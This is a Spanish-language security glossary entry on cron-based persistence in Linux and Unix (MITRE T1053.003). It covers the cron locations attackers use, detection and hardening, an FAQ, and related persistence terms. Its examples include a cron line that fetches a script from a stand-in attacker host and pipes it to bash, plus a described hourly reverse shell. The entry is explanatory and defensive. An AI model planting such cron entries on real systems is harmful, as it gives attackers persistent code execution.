Persistencia mediante cron
¿Qué es Persistencia mediante cron?
Persistencia mediante cronTécnica de persistencia en Linux y Unix que utiliza cron, anacron o temporizadores de systemd para reejecutar código del atacante en un intervalo o evento del sistema.
La persistencia por cron (MITRE ATT&CK T1053.003) ataca al demonio cron de Unix y sus variantes (anacron, fcron, systemd-timer). Los atacantes añaden entradas en /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ o crontabs por usuario (crontab -e). Cargas habituales son reverse shells de una línea, descargas con curl o scripts en /tmp. Como cron se ejecuta como root o como el usuario propietario, la técnica es fiable y trivial tras el acceso inicial. Detección: monitorización de integridad de directorios cron, reglas auditd, baseline de trabajos esperados y alertas EDR sobre shells lanzadas por cron. Endurecimiento: limitar la pertenencia a crontab, montar /tmp con noexec y activar auditoría de systemd-cron cuando esté disponible.
● Ejemplos
- 01
Añadir * * * * * curl -s http://atacante/sh | bash en /etc/cron.d/update.
- 02
Colocar un script en /etc/cron.hourly/ para reabrir una reverse shell cada hora.
● Preguntas frecuentes
¿Qué es Persistencia mediante cron?
Técnica de persistencia en Linux y Unix que utiliza cron, anacron o temporizadores de systemd para reejecutar código del atacante en un intervalo o evento del sistema. Pertenece a la categoría de Ataques y amenazas en ciberseguridad.
¿Qué significa Persistencia mediante cron?
Técnica de persistencia en Linux y Unix que utiliza cron, anacron o temporizadores de systemd para reejecutar código del atacante en un intervalo o evento del sistema.
¿Cómo funciona Persistencia mediante cron?
La persistencia por cron (MITRE ATT&CK T1053.003) ataca al demonio cron de Unix y sus variantes (anacron, fcron, systemd-timer). Los atacantes añaden entradas en /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ o crontabs por usuario (crontab -e). Cargas habituales son reverse shells de una línea, descargas con curl o scripts en /tmp. Como cron se ejecuta como root o como el usuario propietario, la técnica es fiable y trivial tras el acceso inicial. Detección: monitorización de integridad de directorios cron, reglas auditd, baseline de trabajos esperados y alertas EDR sobre shells lanzadas por cron. Endurecimiento: limitar la pertenencia a crontab, montar /tmp con noexec y activar auditoría de systemd-cron cuando esté disponible.
¿Cómo defenderse de Persistencia mediante cron?
Las defensas contra Persistencia mediante cron combinan habitualmente controles técnicos y prácticas operativas, como se detalla en la definición.
¿Cuáles son otros nombres para Persistencia mediante cron?
Nombres alternativos comunes: Persistencia crontab, Persistencia anacron.
● Términos relacionados
- attacks№ 610
Secuestro mediante LD_PRELOAD
Técnica de persistencia y secuestro de librerías en Linux que usa la variable LD_PRELOAD o /etc/ld.so.preload para inyectar código del atacante en procesos enlazados dinámicamente.
- attacks№ 608
Persistencia mediante launchd
Técnica de persistencia en macOS que instala un plist de LaunchDaemon o LaunchAgent para que launchd ejecute el código del atacante al arrancar, iniciar sesión o ante un disparador.
- attacks№ 975
Persistencia por tarea programada
Técnica de persistencia y ejecución en la que el atacante crea o modifica una tarea programada de Windows para ejecutar su payload por inicio de sesión, arranque o temporizador.
- attacks№ 1246
Persistencia por suscripción a eventos WMI
Técnica de persistencia que registra un filtro y un consumidor permanentes de eventos WMI para que el código del atacante se ejecute cuando ocurra un evento del sistema.
- attacks№ 914
Persistencia por clave Run del registro
Técnica clásica de persistencia en Windows que añade una entrada en una clave Run o RunOnce del registro para ejecutar un binario o script cada vez que el usuario inicia sesión.